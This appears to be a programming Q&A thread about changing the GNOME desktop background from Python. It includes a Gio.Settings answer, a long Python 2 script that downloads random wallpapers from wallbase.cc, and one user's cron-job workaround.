bashCommand = "gsettings set org.gnome.desktop.background picture-uri file://" + os.getcwd() + "/" + pic_name
print bashCommand
os.system(bashCommand)
settings.apply()
You've successfully changed your settings, but they're still left unapplied, try next:
settings.apply()
after setting "picture-uri" string.
It works for me (Ubuntu 12.04).
I've modified your script (unrelated to your error):
#!/usr/bin/python
"""Set desktop background using random images from http://wallbase.cc
It uses `gi.repository.Gio.Settings` to set the background.
"""
import functools
import itertools
import logging
import os
import posixpath
import random
import re
import sys
import time
import urllib
import urllib2
import urlparse
from collections import namedtuple
from bs4 import BeautifulSoup # $ sudo apt-get install python-bs4
from gi.repository.Gio import Settings # pylint: disable=F0401,E0611
DEFAULT_IMAGE_DIR = os.path.expanduser('~/Pictures/backgrounds')
HTMLPAGE_SIZE_MAX = 1 << 20 # bytes
TIMEOUT_MIN = 300 # seconds
TIMEOUT_DELTA = 30 # jitter
# "Anime/Manga", "Wallpapers/General", "High Resolution Images"
CATEGORY_W, CATEGORY_WG, CATEGORY_HR = range(1, 4)
PURITY_SFW, PURITY_SKETCHY, PURITY_NSFW, PURITY_DEFAULT = 4, 2, 1, 0
DAY_IN_SECONDS = 86400
UrlRetreiveResult = namedtuple('UrlRetreiveResult', "path headers")
def set_background(image_path, check_exist=True):
"""Change desktop background to image pointed by `image_path`.
"""
if check_exist: # make sure we can read it (at this time)
with open(image_path, 'rb') as f:
f.read(1)
# prepare uri
path = os.path.abspath(image_path)
if isinstance(path, unicode): # quote() doesn't like unicode
path = path.encode('utf-8')
uri = 'file://' + urllib.quote(path)
# change background
bg_setting = Settings.new('org.gnome.desktop.background')
bg_setting.set_string('picture-uri', uri)
bg_setting.apply()
def url2filename(url):
"""Return basename corresponding to url.
>>> url2filename('http://example.com/path/to/file?opt=1')
'file'
"""
urlpath = urlparse.urlsplit(url).path # pylint: disable=E1103
basename = posixpath.basename(urllib.unquote(urlpath))
if os.path.basename(basename) != basename:
raise ValueError # refuse 'dir%5Cbasename.ext' on Windows
return basename
def download(url, dirpath, extensions=True, filename=None):
"""Download url to dirpath.
Use basename of the url path as a filename.
Create destination directory if necessary.
Use `extensions` to require the file to have an extension or any
of in a given sequence of extensions.
Return (path, headers) on success.
Don't retrieve url if path exists (headers are None in this case).
"""
if not os.path.isdir(dirpath):
os.makedirs(dirpath)
logging.info('created directory %s', dirpath)
# get filename from the url
filename = url2filename(url) if filename is None else filename
if os.path.basename(filename) != filename:
logging.critical('filename must not have path separator in it "%s"',
filename)
return
if extensions:
# require the file to have an extension
root, ext = os.path.splitext(filename)
if root and len(ext) > 1:
# require the extension to be in the list
try:
it = iter(extensions)
except TypeError:
pass
else:
if ext not in it:
logging.warn(("file extension is not in the list"
" url=%s"
" extensions=%s"),
url, extensions)
return
else:
logging.warn("file has no extension url=%s", url)
return
# download file
path = os.path.join(dirpath, filename)
logging.info("%s\n%s", url, path)
if os.path.exists(path): # don't retrieve if path exists
logging.info('path exists')
return UrlRetreiveResult(path, None)
try:
return UrlRetreiveResult(*urllib.urlretrieve(url, path,
_print_download_status))
except IOError:
logging.warn('failed to download {url} -> {path}'.format(
url=url, path=path))
def _print_download_status(block_count, block_size, total_size):
logging.debug('%10s bytes of %s', block_count * block_size, total_size)
def min_time_between_calls(min_delay):
"""Enforce minimum time delay between calls."""
def decorator(func):
lastcall = [None] # emulate nonlocal keyword
#functools.wraps(func)
def wrapper(*args, **kwargs):
if lastcall[0] is not None:
delay = time.time() - lastcall[0]
if delay < min_delay:
_sleep(min_delay - delay)
lastcall[0] = time.time()
return func(*args, **kwargs)
return wrapper
return decorator
#min_time_between_calls(5)
def _makesoup(url):
try:
logging.info(vars(url) if isinstance(url, urllib2.Request) else url)
page = urllib2.urlopen(url)
soup = BeautifulSoup(page.read(HTMLPAGE_SIZE_MAX))
return soup
except (IOError, OSError) as e:
logging.warn('failed to return soup for %s, error: %s',
getattr(url, 'get_full_url', lambda: url)(), e)
class WallbaseImages:
"""Given parameters it provides image urls to download."""
def __init__(self,
categories=None, # default; sequence of CATEGORY_*
resolution_exactly=True, # False means 'at least'
resolution=None, # all; (width, height)
aspect_ratios=None, # all; sequence eg, [(5,4),(16,9)]
purity=PURITY_DEFAULT, # combine with |
thumbs_per_page=None, # default; an integer
):
"""See usage below."""
self.categories = categories
self.resolution_exactly = resolution_exactly
self.resolution = resolution
self.aspect_ratios = aspect_ratios
self.purity = purity
self.thumbs_per_page = thumbs_per_page
def _as_request(self):
"""Create a urllib2.Request() using given parameters."""
# make url
if self.categories is not None:
categories = "".join(str(n) for n in (2, 1, 3)
if n in self.categories)
else: # default
categories = "0"
if self.resolution_exactly:
at_least_or_exactly_resolution = "eqeq"
else:
at_least_or_exactly_resolution = "gteq"
if self.resolution is not None:
resolution = "{width:d}x{height:d}".format(
width=self.resolution[0], height=self.resolution[1])
else:
resolution = "0x0"
if self.aspect_ratios is not None:
aspect_ratios = "+".join("%.2f" % (w / float(h),)
for w, h in self.aspect_ratios)
else: # default
aspect_ratios = "0"
purity = "{0:03b}".format(self.purity)
thumbs = 20 if self.thumbs_per_page is None else self.thumbs_per_page
url = ("http://wallbase.cc/random/"
"{categories}/"
"{at_least_or_exactly_resolution}/{resolution}/"
"{aspect_ratios}/"
"{purity}/{thumbs:d}").format(**locals())
logging.info(url)
# make post data
data = urllib.urlencode(dict(query='', board=categories, nsfw=purity,
res=resolution,
res_opt=at_least_or_exactly_resolution,
aspect=aspect_ratios,
thpp=thumbs))
req = urllib2.Request(url, data)
return req
def __iter__(self):
"""Yield background image urls."""
# find links to bigwall pages
# css-like: #thumbs div[class="thumb"] \
# a[class~="thlink" and href^="http://"]
soup = _makesoup(self._as_request())
if not soup:
logging.warn("can't retrieve the main page")
return
thumbs_soup = soup.find(id="thumbs")
for thumb in thumbs_soup.find_all('div', {'class': "thumb"}):
bigwall_a = thumb.find('a', {'class': "thlink",
'href': re.compile(r"^http://")})
if bigwall_a is None:
logging.warn("can't find thlink link")
continue # try the next thumb
# find image url on the bigwall page
# css-like: #bigwall > img[alt and src^="http://"]
bigwall_soup = _makesoup(bigwall_a['href'])
if bigwall_soup is not None:
bigwall = bigwall_soup.find(id='bigwall')
if bigwall is not None:
img = bigwall.find('img',
src=re.compile(r"(?i)^http://.*\.jpg$"),
alt=True)
if img is not None:
url = img['src']
filename = url2filename(url)
if filename.lower().endswith('.jpg'):
yield url, filename # successfully found image url
else:
logging.warn('suspicious url "%s"', url)
continue
logging.warn("can't parse bigwall page")
def main():
level = logging.INFO
if '-d' in sys.argv:
sys.argv.remove('-d')
level = logging.DEBUG
# configure logging
logging.basicConfig(format='%(levelname)s: %(asctime)s %(message)s',
level=level, datefmt='%Y-%m-%d %H:%M:%S %Z')
if len(sys.argv) > 1:
backgrounds_dir = sys.argv[1]
else:
backgrounds_dir = DEFAULT_IMAGE_DIR
# infinite loop: Press Ctrl+C to interrupt it
#NOTE: here's some arbitrary logic: modify for you needs e.g., break
# after the first image found
timeout = TIMEOUT_MIN # seconds
for i in itertools.cycle(xrange(timeout, DAY_IN_SECONDS)):
found = False
try:
for url, filename in WallbaseImages(
categories=[CATEGORY_WG, CATEGORY_HR, CATEGORY_W],
purity=PURITY_SFW,
thumbs_per_page=60):
res = download(url, backgrounds_dir, extensions=('.jpg',),
filename=filename)
if res and res.path:
found = True
set_background(res.path)
# don't hammer the site
timeout = max(TIMEOUT_MIN, i % DAY_IN_SECONDS)
_sleep(random.randint(timeout, timeout + TIMEOUT_DELTA))
except Exception: # pylint: disable=W0703
logging.exception('unexpected error')
_sleep(timeout)
else:
if not found:
logging.error('failed to retrieve any images')
_sleep(timeout)
timeout = (timeout * 2) % DAY_IN_SECONDS
def _sleep(timeout):
"""Add logging to time.sleep() call."""
logging.debug('sleep for %s seconds', timeout)
time.sleep(timeout)
main()
Tried to implement a python script that used the PIL library to write text on an image then update the Gnome background "picture-uri" to point to that image using the Gio class. The python script would ping pong between two images to always modify the one not in use and then attempt to "switch" by updating the Settings. Did this to avoid any flicker as modifying the current background directly drops it out temporarily. While in the shell and calling the script directly I rarely saw any issue, but in the cronjob it simply wouldn't update on the pong. I used both sync and apply and would wait several minutes before trying to switch the images. Didn't work. Tried cron as user (su -c "cmd" user) and that didn't work either.
Finally gave up on the ping pong approach when I noticed that Gnome will detect any change in the background file and update. So dropped the ping pong method and went to a temp file that I just copy over the current background using the shutil library. Works like a charm.

Categories

Resources